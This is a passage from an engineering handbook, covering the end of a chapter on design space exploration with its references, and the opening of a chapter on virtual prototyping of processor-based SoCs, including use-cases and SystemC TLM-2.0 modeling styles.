with respect to the other system objectives such as performance, power/energy
consumption, cost, etc. Thus, covering the security aspect in the earliest phases
of design is necessary to design systems that are, in the end, optimal with regard
to all system objectives. However, this poses great difficulties because unlike
the earlier mentioned conventional system objectives like performance and power
consumption, security is hard to quantify. This necessitates research on techniques
that make it possible to incorporate security as an objective in early DSE.
At this moment, the integration of security aspects in the process of system-
level DSE of embedded systems is still a largely uncharted research ground. Only a
few efforts exist that address this problem, but they typically provide only partial
solutions or solutions to very specific security problems (e.g., Lin et al. 2015;
Weichslgartner et al. 2016; Stierand et al. 2014; Tan et al. 2017). Moreover, in most
of these works, security is modeled as a requirement in the DSE process, which does
not allow for studying actual trade-offs between performance, power consumption,
and cost in relationship to secureness of a design. Only a handful of research efforts,
such as Ferrante et al. (2013) and Gressl et al. (2019), seem to have been aiming at
incorporating security as an objective that can be traded off with other objectives
during early DSE.
942 A. D. Pimentel
References
Balarin F, Sentovich E, Chiodo M, Giusto P, Hsieh H, Tabbara B, Jurecska A, Lavagno L, Passerone
C, Suzuki K, Sangiovanni-Vincentelli A (1997) Hardware-software co-design of embedded
systems – the POLIS approach. Kluwer Academic Publishers, Norwell
Beasley D, Bull DR, Martin RR (1993) An overview of genetic algorithms: part I-fundamentals.
Univ Comput 15(2):58–69
Bellard F (2005) Qemu, a fast and portable dynamic translator. In: Proceedings of the USENIX
annual technical conference, pp 41–46
Binkert N et al (2011) The gem5 simulator. SIGARCH Comput Archit News 39(2):1–7
Bringmann O, Ecker W, Gerstlauer A, Goyal A, Mueller-Gritschneder D, Sasidharan P, Singh S
(2015) The next generation of virtual prototyping: ultra-fast yet accurate simulation of hw/sw
systems. In: Proceedings of the international conference on design, automation & test in Europe
(DATE), pp 1698–1707
Butko A, Garibotti R, Ost L, Lapotre V, Gamatie A, Sassatelli G, Adeniyi-Jones C (2015) A trace-
driven approach for fast and accurate simulation of manycore architectures. In: Proceedings of
the Asia and South Pacific design automation conference (ASP-DAC), pp 707–712
Cai L, Gajski D (2003) Transaction level modeling: an overview. In: Proceedings of the
international conference on hardware/software codesign and system synthesis (CODES+ISSS),
pp 19–24
Castrillon J, Velasquez R, Stulova A, Sheng W, Ceng J, Leupers R, Ascheid G, Meyr H (2010)
Trace-based KPN composability analysis for mapping simultaneous applications to MPSoC
platforms. In: Proceedings of the conference on design, automation test in Europe (DATE),
pp 753–758
Castrillon J, Leupers R, Ascheid G (2013) MAPS: mapping concurrent dataflow applications to
heterogeneous MPSoCs. IEEE Trans Ind Inf 9(1):527–545
Ceng J, Sheng W, Castrillon J, Stulova A, Leupers R, Ascheid G, Meyr H (2009) A high-level
virtual platform for early MPSoC software development. In: Proceedings of the 7th IEEE/ACM
international conference on hardware/software codesign and system synthesis (CODES+ISSS)
Chen Z, Zhou Y, Huang Z (2019) Auto-creation of effective neural network architecture by
evolutionary algorithm and resnet for image classification. In: 2019 IEEE international
conference on systems, man and cybernetics (SMC). IEEE, pp 3895–3900
Deng J, Dong W, Socher R, Li LJ, Li K, Fei-Fei L (2009) Imagenet: a large-scale hierarchical
image database. In: 2009 IEEE conference on computer vision and pattern recognition. IEEE,
pp 248–255
Eeckhout L (2010) Computer architecture performance evaluation methods. Synthesis lectures on
computer architecture. Morgan & Claypool Publishers, San Rafael
Erbas C, Cerav-Erbas S, Pimentel AD (2006) Multiobjective optimization and evolutionary
algorithms for the application mapping problem in multiprocessor system-on-chip design. IEEE
Trans Evolut Comput 10(3):358–374
Erbas C, Pimentel AD, Thompson M, Polstra S (2007) A framework for system-level modeling
and simulation of embedded systems architectures. EURASIP J Embed Syst 207:1–11
Ferrante A, Milosevic J, Janjšević M (2013) A security-enhanced design methodology for embed-
ded systems. In: Proceedings of the international conference on security and cryptography
(SECRYPT), pp 1–12
Gheorghita SV et al (2009) System-scenario-based design of dynamic embedded systems. ACM
Trans Des Autom Electronic Syst 14(1):1–45
Glaß M, Lukasiewycz M, Streichert T, Haubelt C, Teich J (2007) Reliability-aware system
synthesis. In: Proceedings of the conference on design, automation test in Europe, pp 1–6
Glaß M, Lukasiewycz M, Reimann F, Haubelt C, Teich J (2008) Symbolic reliability analysis and
optimization of ecu networks. In: Proceedings of the conference on design, automation and test
in Europe, pp 158–163
26 Methodologies for Design Space Exploration 943
Singh AK, Shafique M, Kumar A, Henkel J (2013) Mapping on multi/many-core systems: survey
of current and emerging trends. In: Proceedings of the design automation conference (DAC),
pp 1–10
Stefanov T, Pimentel AD, Nikolov H (2017) Daedalus: system-level design methodology for
streaming multi-processor embedded systems-on-chip. In: Ha S, Teich J (eds) Handbook of
hardware/software codesign. Springer, Dordrecht
Stierand I, Malipatlolla S, Fröschle S, Stühring A, Henkler S (2014) Integrating the security aspect
into design space exploration of embedded systems. In: Proceedings of the IEEE international
symposium on software reliability engineering workshops, pp 371–376
Tan B, Biglari-Abhari M, Salcic Z (2017) An automated security-aware approach for design of
embedded systems on MPSoC. ACM Trans Embed Comput Syst 16(5s):1–20
Thompson M (2012) Tools and techniques for efficient system-level design space exploration.
Ph.D. thesis, Universiteit van Amsterdam
Thompson M, Pimentel AD (2007) Towards multi-application workload modeling in sesame
for system-level design space exploration. In: Vassiliadis S, Bereković M, Hämäläinen
TD (eds) Embedded computer systems: architectures, modeling, and simulation. Springer,
Berlin/Heidelberg, pp 222–232
Thompson M, Pimentel AD (2013) Exploiting domain knowledge in system-level MPSoC design
space exploration. J Syst Archit 59(7):351–360
Thompson M, Pimentel AD, Polstra S, Erbas C (2006) A mixed-level co-simulation method
for system-level design space exploration. In: Proceedings of the IEEE/ACM workshop on
embedded systems for real-time multimedia (ESTIMedia’06), pp 27–32
Thompson M, Nikolov H, Stefanov T, Pimentel AD, Erbas C, Polstra S, Deprettere E (2007) A
framework for rapid system-level exploration, synthesis and programming of multimedia MP-
SoCs. In: CODES+ISSS’07: proceedings of the 5th IEEE/ACM international conference on
hardware/software codesign and system synthesis, pp 9–14
Thoziyoor S, Ahn JH, Monchiero M, Brockman JB, Jouppi NP (2008) A comprehensive memory
modeling tool and its application to the design and analysis of future memory hierarchies. In:
Proceedings of the international symposium on computer architecture (ISCA), pp 51–62
Uhlig RA, Mudge TN (1997) Trace-driven memory simulation: a survey. ACM Comput Surv
29(2):128–170
van Stralen P, Pimentel AD (2010a) Scenario-based design space exploration of MPSoCs. In:
Proceedings of IEEE international conference on computer design (ICCD), pp 305–312
van Stralen P, Pimentel AD (2010b) A trace-based scenario database for high-level simulation of
multimedia MP-SoCs. In: Proceedings of the international conference on embedded computer
systems: architectures, modeling and simulation (SAMOS), pp 11–19
van Stralen P, Pimentel AD (2012) A SAFE approach towards early design space exploration of
fault-tolerant multimedia MPSoCs. In: Proceedings of international conference on hardware/
software codesign and system synthesis (CODES+ISSS), pp 393–402
van Stralen P, Pimentel AD (2013) Fitness prediction techniques for scenario-based design space
exploration. IEEE Trans Comput-Aided Des Integr Circuits Syst 32(8):1240–1253
Weichslgartner A, Wildermann S, Götzfried J, Freiling F, Glaundefined M, Teich J (2016)
Design-time/run-time mapping of security-critical applications in heterogeneous MPSoCs. In:
Proceedings of the 19th international workshop on software and compilers for embedded
systems (SCOPES), pp 153–162
Wolf W, Jerraya AA, Martin G (2008) Multiprocessor system-on-chip (MPSoC) technology. IEEE
Trans Comput-Aided Des Integr Circuits Syst 27(10):1701–1713
Xie L, Yuille A (2017) Genetic CNN. In: Proceedings of the IEEE international conference on
computer vision, pp 1379–1388
Virtual Prototyping of Processor-Based
Platforms 27
Tim Kogel
Contents
Introduction to Virtual Prototypes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 949
SoC Design and Verification Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 949
Historic Background of Virtual Prototyping . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 951
Virtual Prototyping in the Verification Continuum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 952
Use-Cases for Virtual Prototypes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 954
Architecture Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 956
Software Use-Cases . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 960
Hybrid Use-Cases for Software-Driven Functional Verification . . . . . . . . . . . . . . . . . . . . . 963
System-Level Power Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 965
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 966
Building Transaction Level Virtual Prototypes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 967
The SystemC Transaction Level Modeling Standard . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 967
Building TLM Components for Virtual Prototypes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 973
SSD Controller SoC Case Study . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 977
SSD Controller SoC Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 978
Loosely Timed Virtual Prototype of the SSD SoC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 979
Accurate Virtual Prototype of SSD SoC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 980
SSD Case Study Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 982
Conclusion and Outlook . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 982
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 984
Abstract
T. Kogel ()
Synopsys, Inc., Aachen, Germany
e-mail: [email protected]
They help to reduce risk, shorten time to market, increase design productivity,
and improve the quality of results. This chapter motivates the usage of Virtual
Prototypes and gives an extensive overview of the use-cases in the area of archi-
tecture analysis, software development, and functional verification of processor-
based platforms. This chapter also covers the modeling of Virtual Prototypes,
including an introduction of the SystemC Transaction Level Modeling (TLM)
standard and the modeling of processors and peripheral components. In the last
section, the described concepts of Virtual Prototyping are illustrated by an SSD
Controller example.
Keywords
Acronyms
This section first gives a brief overview of the design and verification of processor-
based SoCs. Based on this overview, the need for Virtual Prototyping to cope
with the growing complexity of architecture specification as well as software
development and testing is discussed.
Today, most chip designs are in fact System-on-Chips (SoC), integrating a mix
of components such as several programmable cores (CPU, GPU, DSP, etc.),
accelerators, different types of memories, a complex interconnect, and potentially
other components (Greaves 2021). According to Handel Jones from IBS, “IC design
costs have jumped from $51.3 million for a 28 nm planar device to $297.8 million
for a 7 nm chip and $542.2 million for 5 nm” (Lapedus 2018). Curiously, the
implementation of new hardware blocks is not a significant cost factor, mostly
because the majority of components are re-usable IP blocks. Instead, much of the
cost is attributed to software development and verification, but also architecture
specification, IP qualification, and SoC-level hardware/software validation.
Figure 1 outlines the state-of-the-art SoC development flow. The classic hardware
design entry is a Register Transfer Level (RTL) implementation based on a hardware
Description Language (HDL) like Verilog or VHDL. This RTL description can be
automatically taken to silicon using standard EDA tools for logic synthesis, place-
and-route, etc. RTL is still a very detailed design entry, so it takes a high effort
to implement and especially verify a hardware component at this level. The devel-
opment of SoCs with multi-billion transistors is only feasible, because the design
entry has moved to higher levels of abstraction. The most productive approach is to
re-use available Intellectual Property (IP) blocks, which are developed internally or
licensed from 3rd party IP providers.
However, custom design is still required for differentiated components, e.g., to
accelerate a specific algorithm in order to achieve the necessary computational
950 T. Kogel
of parallel HW modules and time, but in the initial version the communication was
still limited to HW signals.
The next major release of SystemC 2.0 generalized the modeling of interfaces
between modules, and this way enabled Transaction Level Modeling (TLM)
(Groetker et al. 2002). Still, this did not ensure the level of interoperability required
for the seamless exchange of models. Hence, the next major milestone was the
standardization of a set of well-defined TLM interfaces in 2009. The SystemC
library and TLM APIs were standardized by IEEE in 2005 and 2011, respectively
(IEEE Standard for Standard SystemC Language Reference Manual 2012). As
further explained in section “The SystemC Transaction Level Modeling Standard”,
the Loosely Timed and Approximately Timed APIs defined by the TLM standard
are today the established interoperability standard for Virtual Prototypes.
A multitude of tools and methods is required to cover the different aspects of SoC
verification. Figure 2 qualitatively characterizes prominent verification methods,
with respect to their suitability for architecture analysis and software development.
In the context of this scope, the analysis is based on the following criteria:
• Speed refers to the time it takes to execute a hardware and/or software test.
• Turn-around time refers to the time to modify and rebuild the hardware and/or
software implementation and/or test.
• Early availability describes at what time in the development process the respec-
tive method is available.
• Timing Accuracy denotes the level of timing detail and hence the suitability for
performance analysis.
• Debug and analysis characterize the observability and controllability of the
hardware and/or software under test.
Fig. 2 Comparison of verification methods for architecture design and embedded software
development. Rating: (+)+ → (very) high, 0 → intermediate, (−)− → (very) low
27 Virtual Prototyping of Processor-Based Platforms 953
• Virtual Prototypes for architecture analysis are relatively slow, typically in the
range of 10–100 kcycles/s but provide the required level of timing detail for
performance analysis. They are available early, ahead of RTL, and provide lots
of analysis visibility to support the specification of the SoC specification with
quantitative data. The fast turn-around time of abstract configurable models
enables large-scale design-space exploration.
• Virtual Prototypes for software development trade less timing accuracy for much
higher simulation speed, in the order of 10–100MIPS. The model-based approach
enables software developers to shift left HW/SW integration debug and testing,
but also to scale up to many users and software regressions testing.
954 T. Kogel
In both cases, Virtual Prototypes enable the collaboration across teams and com-
panies, e.g., system and semiconductor companies can jointly define the SoC
architecture based on an executable specification, or semiconductor companies can
enable their customers with a virtual HW/SW integration environment 6–12 months
before silicon availability.
The total cost of deployment is of course another important criterion in addition
to the technical aspects discussed above. Virtual Prototypes come with a price tag
for tool and IP model licenses (or in-house development effort based on open-
source software) as well as for the development of custom models and SoC model
integration. The initial modeling effort for the first Virtual Prototyping project might
be high, but typically many of the IP choices remain constant from one project to
the next. Hence, the ROI greatly increases once a baseline library of models has
been developed, and Virtual Prototyping is deployed as plan of record over multiple
projects.
The remainder of this chapter is organized as follows: section “Use-Cases
for Virtual Prototypes” introduces use-cases of Virtual Prototypes in more detail,
including architecture specification and validation, early software development,
software testing, software-driven functional verification, and early power analysis.
After that, section “Building Transaction Level Virtual Prototypes” covers the
modeling aspects, introducing the TLM 2.0 standard, the levels of abstraction to
address the simulation speed and accuracy requirements of different use-cases, and
in particular the modeling of processors and peripheral components. Finally, we
illustrate the creation and usage of Virtual Prototypes based on a case-study from
the SSD controller domain in section “SSD Controller SoC Case Study”.
The goal of this section is to describe different ways in which Virtual Prototypes
are deployed and what kind of development problems they address. One important
consideration is the specific requirements of the respective use-cases on the Virtual
Prototypes in terms of simulation speed, functional and timing accuracy, visibility,
flexibility, etc. These requirements drive the discussion of abstraction levels in the
next section.
Figure 3 gives an overview of the major use-cases for Virtual Prototyping
along the SoC product life-cycle and as they relate to semiconductor and system
companies.
In the semiconductor development process, the implementation specification
of a new SoC is an important milestone, which determines the major Key Per-
formance Indicators (KPI) like performance, power, and cost. As described in
section “Macro-architecture Specification” Virtual Prototypes for architecture anal-
ysis and exploration help to arrive at an optimal specification, such that the final
SoC meets the KPIs for the target workloads.
Often the semiconductor vendor can only guess how the application workloads
will look like, since this knowledge resides at the system companies building the
actual end product around the chip. Here Virtual Prototypes for architecture analysis
27 Virtual Prototyping of Processor-Based Platforms 955
Fig. 3 Virtual Prototyping use-cases for early architecture analysis (left, dark orange) and
software development (right, light orange) along the product life-cycle
Architecture Analysis
Macro-architecture Specification
In this context, the macro-architecture refers to the configuration of an SoC sub-
system, an SoC, or a multi-SoC design, i.e., the number and type of components
and how they are configured and connected. In contrast, the micro-architecture is
concerned with the implementation details of a single component, e.g., the processor
pipeline or the structure of a Multiply-Accumulate (MAC) array inside a Deep
Learning Accelerator (DLA). The specification of the macro-architecture has major
impact on the non-functional properties of the final product in terms of performance,
power, and cost.
Traditionally, the architecture specification and exploration is done with spread-
sheets analysis, using static formulas to calculate the KPIs. For example, the
Fig. 4 Main architecture use-cases, left showing early architecture exploration and optimization
with workload models, right showing performance validation with software
27 Virtual Prototyping of Processor-Based Platforms 957
In general, the classic Y-chart approach (Kienhuis et al. 1997) is well suited
to address these requirements. As illustrated on the left side of Fig. 4, the idea
is to replace the missing software with a non-functional task graph, which does
not model any behavior, but expresses the available thread-level parallelism and
dependencies of the actual application as well as the processing and communication
requirements. This task-based application workload model can be mapped to
Virtual Processing Units (VPU), which model the execution resources, e.g., a
CPU, GPU, DSP, or HW accelerator (Kempf et al. 2005; Kogel 2006). The VPU
translates the communication requirements from the task graph into transactions,
so the interconnect and memory resources can be represented as timing accurate
TLM models. The timing is modeled by combining stochastic characterization
of individual tasks and the simulation of dynamic effects like task scheduling,
interconnect arbitration, and memory latencies.
958 T. Kogel
This type of workload-based Virtual Prototype meets the requirements for macro-
architecture specification. It is purely based on TLM models and hence does not
depend on any software or hardware implementation. With the right modeling
libraries, the Virtual Prototype is sufficiently easy to create, accurate, and fast.
The flexible allocation of tasks to resources enables fast exploration of application
mapping options. For commercial production projects, this modeling approach
should be combined with the corresponding tooling and model library to achieve
the necessary productivity for the creation, simulation, and analysis during the short
architecture specification phase (Kogel 2017).
Under the umbrella of macro-architecture specification, a workload-based Virtual
Prototype can be used for the following specific tasks:
Software Use-Cases
This section describes the usage of Virtual Prototypes for software-related use-
cases like Operating System (OS) bring-up, driver debug, regression testing, etc.
The common foundation is a transaction-level simulation model of the SoC capable
of executing the unmodified software stack as it would also run on the real silicon.
The emphasis is less on non-functional aspects like performance and power, but
on highest simulation speed and sufficient functional completeness to cater to the
requirements of software developers.
A typical flow for the creation and usage of Virtual Prototypes for software
development (SW-VP) is shown in Fig. 5. A SW-VP contains all the components
that are visible to the programmers’ view of the SoC, i.e., Instruction Set Simulators
(ISSes) of the programmable cores, relevant peripherals like interrupt controller,
timers, UART, memory, flash, etc. Depending on the needs of the SW stack that
is executed on top of the SW-VP, further sub-systems like the power management
controller, GPU, external IO, and hardware accelerators also need to be represented.
The required transaction level models are either provided by the IP suppliers
(Arm Fast Models; Synopsys DesignWare TLM library; Tensilica Customizable
Processors; Intel Integrated Simulation Infrastructure with Modeling; CEVA), or
need to be created by the SW-VP developer.
Independent of the specific use-case, SW-VPs provide several common benefits:
Virtual Hardware in the Loop (HiL) is one important use-case in the automotive
domain for the integration of Virtual Prototypes with 3rd party simulators (Feldner
et al. 2019). As an example, a real-time engine controller application can be
executed on the SW-VP of an Electronic Control Unit (ECU) (Reyes 2013). The
external ECU interfaces are connected to a plant model of the engine, which can
often be reused from a model-based design flow of the control algorithm, e.g.,
in Matlab/Simulink (Simulink). In this context, the Functional Mock-up Interface
(FMI) (Functional Mock-up Interface) as defined by the Modelica Association (The
Modelica Association) is an important interoperability standard for the integration
of plant models into heterogeneous simulation environments.
The following sections describe the use-cases enabled by VPs for SW in more
detail.
962 T. Kogel
• The OS bring-up requires only a rudimentary VP, containing the CPU, Interrupt
Controller, Timer, and a UART.
• Further sub-systems need to be added to the VP in order to enable the develop-
ment of the respective driver code, e.g., for PCIe, Ethernet, USB, etc.
• Developing and testing the secure boot code requires corresponding models of
hardware security modules in the VP.
• Bring-up of Middleware layers, like graphics, audio, video, and AI, again
requires the models of the corresponding sub-systems around the GPU, audio
DSP, video/image processor, and AI accelerator.
Fig. 6 Shift left concept, (top) traditional sequential bring-up process based on available hard-
ware, (bottom) incremental parallel process supported by Virtual Prototypes
27 Virtual Prototyping of Processor-Based Platforms 963
the system. The latter is typically a batch process referred to as regression testing,
automated by a continuous integration server like Jenkins (Jenkins Automation
Server for Continuous IntegrationContinuous Delivery). SW-VPs are well suited
as an execution target for such a state-of-the-art DevOps flow for embedded SW,
as they are more scalable, observable, manipulable, and deterministic as real HW
(Bhote et al. 2019; Accelerate Devops 2019).
The typical regression flow is depicted in Fig. 7. The embedded software code
is maintained in a revision control system for productive distributed development
and version management. The same applies for the unit- and integration-tests as
well as the Virtual Prototype, which both evolve over the product life cycle. Any
modification triggers the continuous integration pipeline, including the build of
the embedded SW and the SW-VP, and then the tests are executed in parallel on
a compute farm. The scripting capabilities of the SW-VP allow the consolidation
of the test results, comprising pass/fail and coverage reports as well as profiling of
metrics such as SW execution times and memory footprint.
As indicated in the right side of Fig. 3, the usage of SW-VPs for regression
testing extends into the post-silicon phase, well beyond the usage for early bring-up.
Even when evaluation boards become available, the SW-VP is a more productive
vehicle for regression testing, as they provide the scalability and availability to
serve large and distributed SW development teams. The deterministic execution
improves the robustness of the test flow, avoiding the unproductive hunt for false-
negative test results due to non-deterministic hardware effects. Especially safety
critical applications can benefit from the automated fault injection features of SW-
VPs; see Oetjens et al. (2014) and Section 4.4 on Virtual Prototyping use-cases for
embedded software testing in DeSchutter (2014).
So far, we have considered “pure virtual” use-cases, where the Virtual Prototype is
constructed entirely from TLM models. There are many good reasons for “hybrid”
use-cases, where the SoC is split into a virtual TLM-based part and an RTL-based
Fig. 7 Building a continuous integration pipeline for embedded software testing with Virtual
Prototypes
964 T. Kogel
Fig. 8 Variations of Hybrid Prototyping use-cases: (left) RTL co-simulation, (middle) hybrid
emulation, (right) hybrid FPGA prototyping
part. The typical setup is that the CPU sub-system executing the main SW stack
is running on the virtual side, and varying portions of the remaining SoC are at the
Register Transfer Level (RTL). This enables software-driven functional verification,
checking the correctness of RTL in the context of the real SW stack.
As shown in Fig. 8, these hybrid use-cases are categorized depending on the exe-
cution environment of the RTL portion, into RTL co-simulation, hybrid emulation,
and hybrid FPGA prototyping.
RTL Co-simulation
The primary use-case for RTL simulation is block-level functional verification,
typically following the SystemVerilog based Universal Verification Methodology
(UVM) (IEEE Standard for Universal Verification Methodology Language Refer-
ence Manual 2020). UVM advocates self-checking testbenches with constrained
random stimuli generation for high coverage. To ensure that the Device Under Test
(DUT) also operates as expected in the real-world context, directed SW-driven tests
verify the RTL using actual SW drivers. Running the CPU executing the SW stack
in the RTL would result in very slow simulation speed and long time to reach the
actual start of the test after the OS is booted up. This simulation can be accelerated
by running the SW on a virtual model of the CPU sub-system, especially when the
TLM and RTL portions are simulated asynchronously (Mäenpää 2020).
Hybrid Emulation
Hardware Emulation can simulate a full SoC at RTL in the range of 5–10 MIPS,
enabling the execute of real SW. However, the emulation of the CPU sub-system
consumes large amounts of emulator resources, and booting an OS at typical
emulation speed of 1–10 MIPS still takes in the order of hours. Again, replacing the
CPU sub-system with a virtual model running at 100 MIPS saves emulator resources
and accelerates the execution by 1–2 orders of magnitude, reducing the OS boot time
to just minutes. With this cost and performance advantage, Hybrid Emulation has
become the standard approach for SoC-level hardware/software verification.
In many cases, hybrid emulation is the entry point for using virtual methods.
Commercial hybrid emulation solutions are available from all major EDA vendors,
and the required virtual models of the CPU sub-system are provided by the IP
27 Virtual Prototyping of Processor-Based Platforms 965
vendor (Arm Fast Models; DesignWare ARC nSIM). Compared to a full Virtual
Prototype, the creation of TLM models of custom components is not required.
The focus of the previous sections is on using Virtual Prototypes for architecture
analysis and for SW development. This section shows how to enable early power
analysis as an overlay to the Virtual Prototyping use-cases discussed so far.
The annotation of power information is achieved by means of System Level
Power (SLP) models, i.e., power models of IP components specifically for appli-
cation in system level design use-cases. The format of system level IP power
models is defined by the IEEE 1801-2015 standard (IEEE Standard for Design and
Verification of Low-Power Integrated Circuits 2015). Originally, the IEEE 1801
Universal Power Format (UPF) was defined to capture power intent for hardware
implementation and verification. UPF is a TCL (Tool Command Language, Tool
CommLanguage) based format and defines the power supply and low power details
as an overlay to the actual HDL implementation (Flynn et al. 2007). The System
Level Power features of the 1801-2015 UPF 3.0 release extend the UPF TCL syntax
to model power consumption as an overlay.
Figure 9 shows an example of a Virtual Prototype with a UPF 3.0 system level
power overlay model. The power state machine defines the power consumption of
Fig. 9 Virtual Prototype with UPF 3.0 System Level Power Monitor
966 T. Kogel
The characterization determines how the power expressions calculate the power
consumption based on power estimates or measurements.
• An early power characterization can be defined using high level estimates, e.g.,
based on the extrapolation of power measurements from previous projects.
• Once RTL and technology libraries are available, RTL or gate-level power
estimation tools can be used to generate look-up tables, which determine power
consumption based on design parameter configuration and operating mode.
• Post-silicon power measurements can still be valuable to characterize the power
consumption of a re-usable IP block for usage in subsequent projects.
Despite the high level of abstraction, it turns out that Virtual Prototypes with
system level power analysis models provide power estimates in the order of 85–
90% accuracy, which are good enough to steer architecture design decision and to
guide SW development in the right direction (Schürmans et al. 2013).
Summary
This section gave an overview of the many use-cases for Virtual Prototypes,
covering early architecture analysis, early software development, regression testing,
and RTL verification based on hybrid prototypes. The benefits in reducing risk,
accelerating schedules, and increasing productivity of HW and SW design are
driving an increasing deployment of Virtual Prototypes in many application domains
(Arm Fixed Virtual Platforms).
27 Virtual Prototyping of Processor-Based Platforms 967
• Early on, mobile application processors and modems were the driver for Virtual
Prototypes to cope with the short design cycles (Aldis 2006).
• The complexity and accelerated innovation in automotive software and electro-
nics is driving increased usage of VPs, especially to improve functional safety
with virtual testing (Feldner et al. 2019).
• Many state-of-the-art SoC design projects in highly competitive application
domains like Artificial Intelligence, SSD storage (Kang et al. 2019), SmartNIC,
IoT, etc. deploy VPs for architecture design and pre-RTL SW development.
A typical flow for the creation of Virtual Prototypes from Transaction Level Models
is shown in Fig. 5. As discussed in previous sections, the suitable level of abstraction
differs greatly depending on the target use-case of the VP. VPs for architecture
analysis require timing accuracy, but can tolerate lower simulation speed, whereas
VPs for SW development require highest possible simulation speed, but only
minimal timing for the functional execution of the embedded SW. This section
first defines more precisely the levels of abstraction for building Virtual Prototypes,
starting with the modeling styles as defined by the SystemC TLM standard. After
that the creation of TLM models for the different components in processor-based
SoCs is presented.
The IEEE 1666 standard for SystemC and Transaction Level Modeling (TLM)
defines the widely accepted modeling language for the creation of Virtual Proto-
types (IEEE Standard for Standard SystemC Language Reference Manual 2012).
SystemC is a C++ library providing a set of classes to model system components and
their communication interfaces, including a co-operative multitasking environment
to model concurrent activity in a system.
On top of SystemC, the TLM library supports the abstract modeling of com-
munication interfaces between SoC components. Since 2008 the TLM-2.0 standard
provides a well-defined set of APIs and payload constructs to create interoperable
TLM models for memory-map-based on-chip communication protocols. On the
other hand, the TLM-2.0 standard is not really suitable for modeling serial interfaces
for the integration of multiple SoCs. This is considered a missing capability,
968 T. Kogel
especially for constructing Virtual Prototypes of bigger systems with multiple SoCs,
like an automotive Electronic Control Unit (ECU) (Feldner et al. 2019).
At the synthesizable Register Transfer Level (RTL), a typical on-chip commu-
nication protocol like AMBA (AMBA AXI and ACE Protocol Specification 2013)
is based on hundreds of individual signals for all attributes of a transaction, like
address, data, control, and synchronization. The key idea of TLM is to model
communication as set of function calls and a payload data structure representing the
full semantics of the communication interface. This greatly reduces the number of
synchronization points between communicating component models, which accord-
ingly improves the overall speed of the event-driven SystemC simulation kernel.
To cover the modeling requirements of different VP use-cases, the IEEE Std
1666 TLM-2.0 Language Reference Manual (IEEE Standard for Standard Sys-
temC Language Reference Manual 2012) identifies the following styles for the
transaction-level modeling of memory-mapped on-chip bus protocols:
• The Loosely Timed (LT) modeling style aims to maximize the simulation speed
by abstracting the communication to the highest level and by minimizing the
synchronization overhead.
• The Approximately Timed (AT) modeling style focuses on the timing of the
transactions between different components by providing multiple timing points
for modeling individual transaction phases.
As illustrated in Fig. 10, both LT and AT modeling styles share the same concepts
of sockets, generic payload, and an extension mechanism for modeling memory-
• Register accuracy: In order to run embedded software correctly, the memory and
memory-mapped register layout and behavior of all relevant components should
be modeled.
• Functional fidelity: All relevant responses of the target hardware should be
modeled.
• Simulation speed: It is important that the Virtual Prototype can execute the
embedded software at a speed that is as close as possible to real time of the
actual target device.
The Loosely Timed (LT) modeling style is intended to maximize the execution speed
while providing the minimal level of required timing fidelity. The key concepts in
the TLM-2.0 standard to achieve high simulation speed on top of the event-driven
SystemC simulation kernel are temporal decoupling, the Direct Memory Interface
(DMI), and blocking communication.
The LT modeling style reflects the software interactions with hardware and how
register content is updated. For example, timer interrupts happen roughly at the
intended time to simulate the timing calibration loop in a Linux boot, or to execute
real-time software in automotive Electronic Control Units (ECUs).
970 T. Kogel
Fig. 11 TLM-2.0 Protocols for Loosely Timed (left) and Approximately Timed (right)
• Scalable timing accuracy: The accuracy requirements depend on the goal of the
project. For example, an abstract model of a DRAM is good enough for exploring
HW/SW partitioning, but a highly accurate model is needed for optimizing the
configuration of the DRAM memory controller.
27 Virtual Prototyping of Processor-Based Platforms 971
Extended AT
The TLM2.0 AT base protocol has limited expressiveness when it comes to
accurately representing real-world on-chip bus protocols:
• It does not provide timing points for the individual data beats of a burst transfer.
This becomes particularly problematic when interfacing TLM-2.0 AT-BP with
cycle accurate or RTL models.
• It requires all address and data information to be available for writes at the start
of the transaction. Equally, all data for a read response needs to be available at
the start of the response.
• It is not possible to have concurrent read and write requests, as, e.g., required by
the AMBA AXI protocol (AMBA AXI and ACE Protocol Specification 2013).
Fig. 12 TLM-2.0 Extended Fast Timed Protocol example representing AMBA AXI read (top) and
AXI write (bottom)
Protocol specific extensions can break the interoperability between the TLM-
2.0 AT Base Protocol (AT-BP) and extended AT models. The FT modeling style
is defined using ignorable extensions in a way that enables the definition of more
accurate protocols while preserving interoperability with the AT-BP.
• FT extends the generic payload with an optional attribute indicating the current
state in the protocol state machine.
• FT uses extended sockets that provide the necessary protocol conversion logic
such that conversions are only done when required and can be inserted automat-
ically. This way the extended set of FT protocol phases can be mapped to the
standard set of AT-BP phases.
• For each specific protocol, protocol-specific attributes are added as needed, e.g.,
for cacheability, out-of-order transactions, etc. This should be limited to those
attributes that are not already covered by the TLM2.0 base protocol, so the
extended protocol can fall back to the more generic AT base protocol.
Specific FT protocols represent the full set of protocol phases and transaction
